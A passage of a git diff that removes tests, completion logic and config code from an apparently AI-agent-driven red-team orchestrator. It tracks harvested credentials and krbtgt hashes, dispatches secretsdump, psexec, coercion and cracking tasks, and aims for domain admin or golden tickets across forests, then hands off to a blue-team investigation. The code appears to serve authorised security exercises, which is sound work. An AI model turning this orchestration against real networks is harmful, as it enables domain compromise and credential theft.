None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: aes_key.map(|s| s.to_string()), - } -} - -fn make_handler() -> OrchestratorCallbackHandler { - OrchestratorCallbackHandler::new_for_test(SharedState::new("test-op".to_string())) -} - -#[tokio::test] -async fn test_credential_summary_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c1".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_credentials"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_credential_summary_with_data() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "pass", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "pass1", "contoso.local", false)); - } - - let call = ToolCall { - id: "c2".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_credentials"], 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_summary_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c3".into(), - name: "get_hash_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total_hashes"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_lookup() { - let handler = make_handler(); - { - let mut s = 
handler.state.write().await; - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b435b51404ee:313b6f423a71d74c", - Some("f8b6c5e4d3a2b109"), - )); - } - - let call = ToolCall { - id: "c4".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "krbtgt", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("313b6f423a71d74c")); - assert!(msg.contains("f8b6c5e4d3a2b109")); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_not_found() { - let handler = make_handler(); - let call = ToolCall { - id: "c5".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "nobody", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => assert!(msg.contains("No hashes found")), - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_pending_tasks_empty() { - let handler = make_handler(); - let call = ToolCall { - id: "c6".into(), - name: "get_pending_tasks".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total"], 0); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_unknown_tool_returns_none() { - let handler = make_handler(); - let call = ToolCall { - id: "c7".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(handler.handle_callback(&call).await.is_none()); -} - -#[tokio::test] -async fn test_dispatch_without_dispatcher() { - let handler = make_handler(); - let call = ToolCall { - id: "c8".into(), - name: "dispatch_recon".into(), - arguments: json!({"target_ip": "192.168.58.10"}), - }; - let result = handler.handle_callback(&call).await.unwrap(); - assert!(result.is_err()); // No dispatcher configured -} - -#[tokio::test] -async fn test_operation_summary() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "pass", "contoso.local", true)); - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b435:313b6f42", - None, - )); - s.has_domain_admin = true; - } - - let call = ToolCall { - id: "c10".into(), - name: "get_operation_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["credentials"]["total"], 1); - assert_eq!(parsed["credentials"]["admin"], 1); - assert_eq!(parsed["hashes"]["total"], 1); - assert_eq!(parsed["has_domain_admin"], true); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_dispatch_crack_without_dispatcher() { - let handler = make_handler(); - let call = ToolCall { - id: "c11".into(), - name: "dispatch_crack".into(), - arguments: json!({"hash_value": "aad3b435:beef", "hash_type": "ntlm"}), - }; - let result = handler.handle_callback(&call).await.unwrap(); - assert!(result.is_err()); // No dispatcher configured -} - -#[tokio::test] -async fn test_all_credentials_pagination() { - 
let handler = make_handler(); - { - let mut s = handler.state.write().await; - for i in 0..10 { - s.credentials.push(make_cred( - &format!("user{i}"), - "pass", - "contoso.local", - false, - )); - } - } - - let call = ToolCall { - id: "c9".into(), - name: "get_all_credentials".into(), - arguments: json!({"limit": 3, "offset": 2}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(parsed["total"], 10); - assert_eq!(parsed["credentials"].as_array().unwrap().len(), 3); - assert_eq!(parsed["offset"], 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_full_summary_with_populated_state() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "P@ss1", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "pass1", "contoso.local", false)); - s.credentials - .push(make_cred("svc_sql", "SqlP@ss", "fabrikam.local", false)); - s.hashes.push(make_hash( - "krbtgt", - "contoso.local", - "NTLM", - "aad3b:beef", - None, - )); - let mut h = make_hash("admin", "contoso.local", "NTLM", "aad3b:dead", None); - h.cracked_password = Some("cracked123".into()); - s.hashes.push(h); - s.has_domain_admin = true; - s.domains.push("contoso.local".into()); - s.discovered_vulnerabilities.insert( - "vuln-1".into(), - ares_core::models::VulnerabilityInfo { - vuln_id: "vuln-1".into(), - vuln_type: "constrained_delegation".into(), - target: "192.168.58.30".into(), - discovered_by: "test".into(), - discovered_at: chrono::Utc::now(), - details: { - let mut m = std::collections::HashMap::new(); - m.insert("account".into(), json!("svc_sql")); - m - }, - recommended_agent: String::new(), - priority: 5, - }, - ); - } - - let call = ToolCall { - id: "int-1".into(), - name: "get_operation_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["credentials"]["total"], 3); - assert_eq!(p["credentials"]["admin"], 1); - assert_eq!(p["hashes"]["total"], 2); - assert_eq!(p["hashes"]["cracked"], 1); - assert_eq!(p["has_domain_admin"], true); - assert_eq!(p["discovered_vulnerabilities"], 1); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_credential_summary_multi_domain() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.credentials - .push(make_cred("admin", "p1", "contoso.local", true)); - s.credentials - .push(make_cred("user1", "p2", "contoso.local", false)); - s.credentials - .push(make_cred("admin2", "p3", "fabrikam.local", true)); - } - - let call = ToolCall { - id: "int-2".into(), - name: "get_credential_summary".into(), - arguments: json!({}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["total_credentials"], 3); - let domains = p["by_domain"].as_array().unwrap(); - assert_eq!(domains.len(), 2); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_case_insensitive_lookup() { - let handler = make_handler(); - { - let mut s = 
handler.state.write().await; - s.hashes.push(make_hash( - "Administrator", - "CONTOSO.LOCAL", - "NTLM", - "beef:dead", - None, - )); - } - - let call = ToolCall { - id: "int-3".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "administrator", "domain": "contoso.local"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => assert!(msg.contains("beef:dead")), - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_hash_value_filter_by_type() { - let handler = make_handler(); - { - let mut s = handler.state.write().await; - s.hashes.push(make_hash( - "admin", - "contoso.local", - "NTLM", - "ntlm_hash", - None, - )); - s.hashes.push(make_hash( - "admin", - "contoso.local", - "aes256", - "aes_hash", - None, - )); - } - - let call = ToolCall { - id: "int-4".into(), - name: "get_hash_value".into(), - arguments: json!({"username": "admin", "domain": "contoso.local", "hash_type": "aes256"}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("aes_hash")); - assert!(!msg.contains("ntlm_hash")); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} - -#[tokio::test] -async fn test_all_dispatch_tools_fail_without_dispatcher() { - let handler = make_handler(); - let dispatch_tools = [ - ("dispatch_recon", json!({"target_ip": "192.168.58.10"})), - ( - "dispatch_credential_access", - json!({"technique": "secretsdump", "target_ip": "x", "domain": "x", "username": "x", "password": "x"}), - ), - ( - "dispatch_lateral_movement", - json!({"target_ip": "x", "technique": "psexec", "username": "x", "password": "x", "domain": "x"}), - ), - ("dispatch_privesc_exploit", json!({"vuln_id": "v-1"})), - ( - "dispatch_coercion", - json!({"target_ip": "x", "listener_ip": "x"}), - ), - ( - "dispatch_crack", - json!({"hash_value": "aad3b:beef", "hash_type": "ntlm"}), - ), - ]; - - for (tool, args) in &dispatch_tools { - let call = ToolCall { - id: format!("disp-{tool}"), - name: tool.to_string(), - arguments: args.clone(), - }; - let result = handler.handle_callback(&call).await; - assert!(result.is_some(), "Should recognize: {tool}"); - assert!( - result.unwrap().is_err(), - "Should error without dispatcher: {tool}" - ); - } -} - -#[tokio::test] -async fn test_all_callback_tools_recognized() { - let handler = make_handler(); - let tools = [ - "get_credential_summary", - "get_hash_summary", - "get_all_credentials", - "get_all_hashes", - "get_hash_value", - "get_pending_tasks", - "get_operation_summary", - "dispatch_recon", - "dispatch_credential_access", - "dispatch_lateral_movement", - "dispatch_privesc_exploit", - "dispatch_coercion", - "dispatch_crack", - ]; - - for tool in &tools { - let call = ToolCall { - id: format!("route-{tool}"), - name: tool.to_string(), - arguments: json!({"username": "x", "domain": "x", "target_ip": "x", - "technique": "x", "password": "x", "hash_value": "x", - "hash_type": "x", "vuln_id": "x", "listener_ip": "x"}), - }; - assert!( - handler.handle_callback(&call).await.is_some(), - "Handler should recognize: {tool}" - ); - } - - // Unknown tool returns None - let call = ToolCall { - id: "route-unknown".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(handler.handle_callback(&call).await.is_none()); -} - -#[tokio::test] -async fn test_all_hashes_pagination_large() { - let handler = make_handler(); - { - let mut s 
= handler.state.write().await; - for i in 0..50 { - s.hashes.push(make_hash( - &format!("user{i}"), - "contoso.local", - "NTLM", - &format!("hash_{i}"), - None, - )); - } - } - - let call = ToolCall { - id: "int-pg".into(), - name: "get_all_hashes".into(), - arguments: json!({"limit": 10, "offset": 40}), - }; - let result = handler.handle_callback(&call).await.unwrap().unwrap(); - match result { - CallbackResult::Continue(msg) => { - let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); - assert_eq!(p["total"], 50); - assert_eq!(p["hashes"].as_array().unwrap().len(), 10); - } - other => panic!("Expected Continue, got: {:?}", other), - } -} diff --git a/ares-orchestrator/src/completion.rs b/ares-orchestrator/src/completion.rs deleted file mode 100644 index 54383290..00000000 --- a/ares-orchestrator/src/completion.rs +++ /dev/null @@ -1,492 +0,0 @@ -//! Completion and golden-ticket wait loops. -//! -//! These functions block (async) until the operation reaches a terminal state: -//! all forests dominated, golden tickets forged, max runtime exceeded, or -//! explicit shutdown. -//! -//! Two config flags control early-exit behaviour (mutually exclusive): -//! - `stop_on_domain_admin`: stop as soon as DA is achieved on any domain, -//! without waiting for all trusted forests to be dominated. -//! - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with -//! ExtraSid for child→parent escalation, then stop once forged. - -use std::collections::HashSet; -use std::sync::Arc; -use std::time::Duration; - -use chrono::Utc; -use redis::AsyncCommands; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::SharedState; - -/// Pure computation: given state fields, return undominated forest root domains. -/// -/// Used by both the async `undominated_forests()` and `SharedState::snapshot()`. -pub fn compute_undominated_forests( - target_domain: Option<&str>, - first_domain: Option<&str>, - trusted_domains: &std::collections::HashMap, - dominated_domains: &HashSet, -) -> Vec { - let mut required_forests: HashSet = HashSet::new(); - - if let Some(td) = target_domain { - if !td.is_empty() { - required_forests.insert(forest_root_of(td)); - } - } - if let Some(fd) = first_domain { - required_forests.insert(forest_root_of(fd)); - } - - for trust in trusted_domains.values() { - if trust.is_cross_forest() { - required_forests.insert(forest_root_of(&trust.domain)); - } - } - - if required_forests.is_empty() { - return Vec::new(); - } - - let dominated_roots: HashSet = dominated_domains - .iter() - .map(|d| forest_root_of(d)) - .collect(); - - required_forests - .difference(&dominated_roots) - .cloned() - .collect() -} - -/// Check if all trusted forests have been dominated. -/// -/// Returns a list of forest root domains that still need krbtgt hashes. -/// An empty list means all forests are dominated. -/// -/// This mirrors Python's `all_forests_dominated()` which checks that -/// krbtgt hashes are obtained from every trusted forest, not just the -/// initial target domain. -pub async fn undominated_forests(state: &SharedState) -> Vec { - let inner = state.read().await; - compute_undominated_forests( - inner.target.as_ref().map(|t| t.domain.as_str()), - inner.domains.first().map(|d| d.as_str()), - &inner.trusted_domains, - &inner.dominated_domains, - ) -} - -/// Extract forest root from a domain FQDN. 
-///
-/// For `north.contoso.local` → `contoso.local`
-/// For `contoso.local` → `contoso.local`
-fn forest_root_of(domain: &str) -> String {
-    let lower = domain.to_lowercase();
-    let parts: Vec<&str> = lower.split('.').collect();
-    if parts.len() <= 2 {
-        lower
-    } else {
-        // Walk up to find the 2-part root (assumes .local/.com TLD)
-        parts[parts.len() - 2..].join(".")
-    }
-}
-
-/// Main operation completion loop.
-///
-/// Polls every `interval` checking for:
-/// - All forests dominated (krbtgt from every trusted forest)
-/// - `completed` flag set (external completion signal)
-/// - Max runtime exceeded
-///
-/// Behaviour is influenced by two mutually exclusive config flags:
-/// - `stop_on_domain_admin`: stop as soon as DA is achieved on *any* domain,
-///   without waiting for forests or golden tickets.
-/// - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with
-///   ExtraSid, then stop. If the ticket isn't forged within 60 s of DA, stop
-///   anyway.
-///
-/// When neither flag is set (default), the operation continues until all
-/// trusted forests are dominated or max runtime is exceeded.
-pub async fn wait_for_completion(
-    state: &SharedState,
-    dispatcher: &Arc<Dispatcher>,
-    mut shutdown_rx: watch::Receiver<bool>,
-    max_runtime: Duration,
-    interval: Duration,
-) {
-    let start = tokio::time::Instant::now();
-
-    // Read stop-condition flags from config (default: both false)
-    let (stop_on_da, stop_on_gt) = dispatcher
-        .ares_config
-        .as_ref()
-        .map(|c| {
-            (
-                c.operation.stop_on_domain_admin,
-                c.operation.stop_on_golden_ticket,
-            )
-        })
-        .unwrap_or((false, false));
-
-    info!(
-        max_runtime_secs = max_runtime.as_secs(),
-        stop_on_domain_admin = stop_on_da,
-        stop_on_golden_ticket = stop_on_gt,
-        "Completion monitor started"
-    );
-
-    loop {
-        // Check shutdown
-        if *shutdown_rx.borrow() {
-            info!("Completion monitor interrupted by shutdown");
-            return;
-        }
-
-        let elapsed = start.elapsed();
-        let (has_da, has_gt, completed) = {
-            let inner = state.read().await;
-            (
-                inner.has_domain_admin,
-                inner.has_golden_ticket,
-                inner.completed,
-            )
-        };
-
-        // Check completion conditions.
-        //
-        // Priority order matches Python's _wait_for_completion():
-        //   1. External completed flag (e.g. CLI stop signal)
-        //   2. Max runtime exceeded
-        //   3. stop_on_domain_admin: stop immediately on DA
-        //   4. stop_on_golden_ticket: stop when DA + golden ticket achieved
-        //   5. Default: stop when all trusted forests are dominated
-        let reason = if completed {
-            Some("operation marked completed")
-        } else if elapsed >= max_runtime {
-            Some("max runtime exceeded")
-        } else if has_da {
-            if stop_on_da {
-                // Config says stop immediately on DA — skip forest check
-                Some("domain admin achieved (stop_on_domain_admin)")
-            } else if stop_on_gt {
-                // stop_on_golden_ticket: keep running until GT is forged.
-                // Do NOT fall through to the "all forests dominated" default
-                // path — that would exit without the golden ticket.
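Aside (reviewer note, not part of the patch): the branch that resumes below is easier to audit as a pure precedence function. This stand-alone restatement (illustrative names, no Redis or tokio) encodes the same order, including the subtlety the comment above warns about, namely that `stop_on_golden_ticket` must not fall through to the forest check:

```rust
fn stop_reason(
    completed: bool,
    over_max_runtime: bool,
    has_da: bool,
    has_gt: bool,
    stop_on_da: bool,
    stop_on_gt: bool,
    undominated_forests: usize,
) -> Option<&'static str> {
    if completed {
        return Some("operation marked completed");
    }
    if over_max_runtime {
        return Some("max runtime exceeded");
    }
    if !has_da {
        return None; // nothing below applies before domain admin
    }
    if stop_on_da {
        return Some("domain admin achieved");
    }
    if stop_on_gt {
        // Keep running until the ticket exists, even if all forests are done.
        return has_gt.then_some("golden ticket forged");
    }
    (undominated_forests == 0).then_some("all forests dominated")
}

fn main() {
    // DA reached and every forest dominated, but no ticket yet: keep running.
    assert_eq!(stop_reason(false, false, true, false, false, true, 0), None);
    assert_eq!(
        stop_reason(false, false, true, true, false, true, 0),
        Some("golden ticket forged")
    );
}
```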
- if has_gt { - Some("golden ticket forged (stop_on_golden_ticket)") - } else { - None // Continue — waiting for golden ticket - } - } else { - // Default: continue until all forests are dominated - let remaining = undominated_forests(state).await; - if remaining.is_empty() { - Some("all forests dominated") - } else { - debug!( - undominated = ?remaining, - "DA achieved but forests remain undominated" - ); - None // Continue — other forests still need krbtgt - } - } - } else { - None - }; - - if let Some(reason) = reason { - info!( - reason = reason, - elapsed_secs = elapsed.as_secs(), - has_domain_admin = has_da, - has_golden_ticket = has_gt, - "Completion condition met" - ); - - // When blue team is enabled, auto-submit an investigation from the - // operation state if none have been submitted yet, then wait for all - // investigations to drain before signalling stop. - // Cap at 45 minutes to avoid hanging forever if an investigation is stuck. - if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { - info!("Blue team enabled — waiting for investigations to finish before shutdown"); - let mut conn = dispatcher.queue.connection(); - - // Check if any blue investigations already exist for this operation. - // If not, auto-submit one so blue always gets at least one run. - let op_inv_key = format!( - "ares:blue:op:{}:investigations", - dispatcher.config.operation_id - ); - let existing: i64 = redis::cmd("SCARD") - .arg(&op_inv_key) - .query_async(&mut conn) - .await - .unwrap_or(0); - if existing == 0 { - info!("No blue investigations found — auto-submitting from operation state"); - if let Err(e) = - auto_submit_blue_investigation(state, dispatcher, &mut conn).await - { - warn!(err = %e, "Failed to auto-submit blue investigation"); - } - } - let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(2700); - loop { - if *shutdown_rx.borrow() { - info!("Completion monitor interrupted by shutdown while waiting for blue"); - break; - } - - if tokio::time::Instant::now() >= blue_deadline { - warn!("Blue team wait deadline reached (45m) — proceeding with shutdown"); - break; - } - - let active: i64 = redis::cmd("SCARD") - .arg(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) - .query_async(&mut conn) - .await - .unwrap_or(0); - let queued: i64 = redis::cmd("LLEN") - .arg("ares:blue:investigations") - .query_async(&mut conn) - .await - .unwrap_or(0); - - if active == 0 && queued == 0 { - info!("All blue investigations finished"); - break; - } - - info!( - active_investigations = active, - queued_investigations = queued, - "Waiting for blue team to finish..." - ); - - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(10)) => {} - _ = shutdown_rx.changed() => { - if *shutdown_rx.borrow() { - break; - } - } - } - } - } - - // Signal the main loop to stop via Redis so it breaks out of its - // select! within the next 5-second poll cycle. - { - let mut conn = dispatcher.queue.connection(); - if let Err(e) = ares_core::state::request_stop_operation( - &mut conn, - &dispatcher.config.operation_id, - ) - .await - { - warn!(err = %e, "Failed to set Redis stop signal from completion monitor"); - } - } - - // Extend the lock one final time before returning - if let Err(e) = dispatcher.extend_lock().await { - warn!(err = %e, "Failed to extend lock during completion"); - } - - return; - } - - // Sleep until next check or shutdown - tokio::select! 
{ - _ = tokio::time::sleep(interval) => {} - _ = shutdown_rx.changed() => { - if *shutdown_rx.borrow() { - info!("Completion monitor interrupted by shutdown"); - return; - } - } - } - } -} - -/// Auto-submit a blue team investigation from the current red team operation state. -/// -/// Mirrors the logic in `ares-cli/src/blue/submit.rs::blue_from_operation()` but -/// runs inline within the orchestrator process so blue always gets at least one -/// investigation even when the red operation completes before blue's first poll. -async fn auto_submit_blue_investigation( - state: &SharedState, - dispatcher: &Arc, - conn: &mut redis::aio::ConnectionManager, -) -> Result<(), anyhow::Error> { - let op_id = &dispatcher.config.operation_id; - let now = Utc::now(); - let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); - - // Read state snapshot for building the synthetic alert - let (target_domain, target_env, cred_count, host_count, vuln_count, has_da, target_ips) = { - let inner = state.read().await; - let domain = inner - .target - .as_ref() - .map(|t| t.domain.clone()) - .unwrap_or_default(); - let env = inner - .target - .as_ref() - .map(|t| t.environment.clone()) - .unwrap_or_default(); - let ips: Vec = inner.hosts.iter().map(|h| h.ip.clone()).collect(); - ( - domain, - env, - inner.credentials.len(), - inner.hosts.len(), - inner.discovered_vulnerabilities.len(), - inner.has_domain_admin, - ips, - ) - }; - - // Collect attack techniques from Redis - let techniques_key = format!("ares:op:{op_id}:techniques"); - let techniques: Vec = redis::cmd("SMEMBERS") - .arg(&techniques_key) - .query_async(conn) - .await - .unwrap_or_default(); - - let operation_context = serde_json::json!({ - "operation_id": op_id, - "attack_window_start": now.to_rfc3339(), - "attack_window_end": now.to_rfc3339(), - "techniques_used": &techniques[..std::cmp::min(techniques.len(), 20)], - "deployment": target_env, - }); - - let alert = serde_json::json!({ - "labels": { - "alertname": format!("RedTeamOperation_{}", op_id), - "severity": "critical", - "source": "ares-red-team", - "deployment": target_env, - }, - "annotations": { - "summary": format!( - "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", - ), - "description": format!( - "Investigate blue team detection coverage for red team operation {op_id}. \ - Domain: {target_domain}. 
Domain admin: {has_da}.", - ), - }, - "operation_context": operation_context, - "startsAt": now.to_rfc3339(), - "endsAt": now.to_rfc3339(), - "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], - }); - - // Resolve model from env (same precedence as CLI) - let model = std::env::var("ARES_BLUE_LLM_MODEL") - .ok() - .filter(|s| !s.is_empty()) - .or_else(|| std::env::var("ARES_MODEL_OVERRIDE").ok()) - .or_else(|| std::env::var("ARES_ORCHESTRATOR_MODEL").ok()) - .or_else(|| std::env::var("ARES_MODEL").ok()); - - let grafana_url = std::env::var("GRAFANA_URL").ok(); - let grafana_api_key = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - - let max_steps: u32 = std::env::var("ARES_BLUE_MAX_STEPS") - .ok() - .and_then(|s| s.parse().ok()) - .unwrap_or(75); - - let request = serde_json::json!({ - "investigation_id": inv_id, - "alert": alert, - "correlation_context": null, - "model": model, - "max_steps": max_steps, - "multi_agent": true, - "auto_route": false, - "report_dir": null, - "grafana_url": grafana_url, - "grafana_api_key": grafana_api_key, - "submitted_at": now.to_rfc3339(), - }); - - // Store env vars for the blue runner (Grafana token, API keys) - let env_vars: std::collections::HashMap = [ - "ANTHROPIC_API_KEY", - "OPENAI_API_KEY", - "GRAFANA_SERVICE_ACCOUNT_TOKEN", - "GRAFANA_URL", - ] - .iter() - .filter_map(|&key| std::env::var(key).ok().map(|v| (key.to_string(), v))) - .collect(); - - if !env_vars.is_empty() { - let env_vars_key = format!("ares:blue:inv:{inv_id}:env_vars"); - let env_json = serde_json::to_string(&env_vars)?; - let _: () = conn.set(&env_vars_key, &env_json).await?; - let _: () = conn.expire(&env_vars_key, 3600).await?; - } - - // Pre-register as active BEFORE pushing to queue to avoid TOCTOU race: - // without this, the completion wait loop can observe both queued==0 and - // active==0 in the window between the blue orchestrator's BRPOP (drains - // the queue) and its register_investigation (SADDs to active set). - let _: () = conn - .sadd(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, &inv_id) - .await?; - let _: () = conn - .expire(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, 86400) - .await?; - - // Push investigation request to queue - let request_json = serde_json::to_string(&request)?; - let _: () = conn - .rpush("ares:blue:investigations", &request_json) - .await?; - - // Track investigation against operation - let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); - let _: () = conn.sadd(&op_inv_key, &inv_id).await?; - let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; - - info!( - investigation_id = inv_id, - operation_id = op_id, - "Auto-submitted blue investigation from operation state" - ); - - Ok(()) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_forest_root_of_simple() { - assert_eq!(forest_root_of("contoso.local"), "contoso.local"); - } - - #[test] - fn test_forest_root_of_child() { - assert_eq!(forest_root_of("north.contoso.local"), "contoso.local"); - } - - #[test] - fn test_forest_root_of_deep_child() { - assert_eq!(forest_root_of("sub.north.contoso.local"), "contoso.local"); - } -} diff --git a/ares-orchestrator/src/config.rs b/ares-orchestrator/src/config.rs deleted file mode 100644 index fcaefb39..00000000 --- a/ares-orchestrator/src/config.rs +++ /dev/null @@ -1,365 +0,0 @@ -//! Configuration loaded from environment variables. -//! -//! Mirrors the Python `ares.core.config` module. Every knob exposed to the -//! Python orchestrator is also configurable here so the Rust binary is a -//! 
drop-in replacement. - -use std::env; -use std::time::Duration; - -/// All tunables for the orchestrator, loaded once at startup. -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct OrchestratorConfig { - /// Redis connection URL (supports `redis://` and `redis+sentinel://`). - pub redis_url: String, - - /// Operation ID this orchestrator instance manages. - pub operation_id: String, - - /// Maximum number of concurrent LLM-consuming tasks across all roles. - pub max_concurrent_tasks: usize, - - /// Interval between heartbeat sweeps. - pub heartbeat_interval: Duration, - - /// How long before an agent with no heartbeat is considered dead. - pub heartbeat_timeout: Duration, - - /// How often the result consumer polls Redis for completed tasks. - pub result_poll_interval: Duration, - - /// TTL for the operation lock key (`ares:lock:{op_id}`). - pub lock_ttl: Duration, - - /// How often the deferred-queue processor wakes up. - pub deferred_poll_interval: Duration, - - /// Maximum number of tasks a single role can have in-flight. - pub max_tasks_per_role: usize, - - /// Global rate-limit: minimum delay between consecutive task dispatches. - pub dispatch_delay: Duration, - - /// How long before an in-progress task with no activity is considered stale. - pub stale_task_timeout: Duration, - - /// Maximum age for deferred tasks before eviction (seconds). - pub deferred_task_max_age: Duration, - - /// Maximum number of deferred tasks per task type. - pub max_deferred_per_type: usize, - - /// Maximum total deferred tasks across all types. - pub max_deferred_total: usize, - - /// Target domain for the operation (e.g. "contoso.local"). - pub target_domain: String, - - /// Target IPs for the operation (comma-separated in env, parsed to vec). - pub target_ips: Vec, - - /// Initial credential to seed at startup (optional). - /// Format: `user:pass@domain` or from JSON payload. - pub initial_credential: Option, -} - -/// A credential provided at operation launch time. -#[derive(Debug, Clone)] -pub struct InitialCredential { - pub username: String, - pub password: String, - pub domain: String, -} - -impl OrchestratorConfig { - /// Load configuration from environment variables with sensible defaults. - pub fn from_env() -> anyhow::Result { - let redis_url = - env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); - - let raw_op = env::var("ARES_OPERATION_ID") - .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?; - - // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON - // payload (the queue dispatcher passes the entire operation request JSON). - let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') { - let v: serde_json::Value = serde_json::from_str(&raw_op) - .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?; - let op_id = v["operation_id"] - .as_str() - .ok_or_else(|| anyhow::anyhow!("Missing operation_id in JSON payload"))? - .to_string(); - let domain = v["target_domain"].as_str().unwrap_or("").to_string(); - let ips: Vec = v["target_ips"] - .as_array() - .map(|arr| { - arr.iter() - .filter_map(|v| v.as_str().map(|s| s.to_string())) - .collect() - }) - .unwrap_or_default(); - // Extract initial credential from JSON payload. 
- // Python sends a nested object: {"initial_credential": {"username": ..., "password": ..., "domain": ...}} - // Also support flat fields for backwards compatibility: {"initial_username": ..., "initial_password": ...} - let cred = if let Some(ic) = v.get("initial_credential").and_then(|v| v.as_object()) { - match ( - ic.get("username").and_then(|v| v.as_str()), - ic.get("password").and_then(|v| v.as_str()), - ) { - (Some(user), Some(pass)) => Some(InitialCredential { - username: user.to_string(), - password: pass.to_string(), - domain: ic - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(&domain) - .to_string(), - }), - _ => None, - } - } else { - // Flat field fallback - match ( - v["initial_username"].as_str(), - v["initial_password"].as_str(), - ) { - (Some(user), Some(pass)) => Some(InitialCredential { - username: user.to_string(), - password: pass.to_string(), - domain: v["initial_domain"].as_str().unwrap_or(&domain).to_string(), - }), - _ => None, - } - }; - (op_id, domain, ips, cred) - } else { - // Plain operation ID — read target info from separate env vars - let domain = env::var("ARES_TARGET_DOMAIN").unwrap_or_default(); - let ips: Vec = env::var("ARES_TARGET_IPS") - 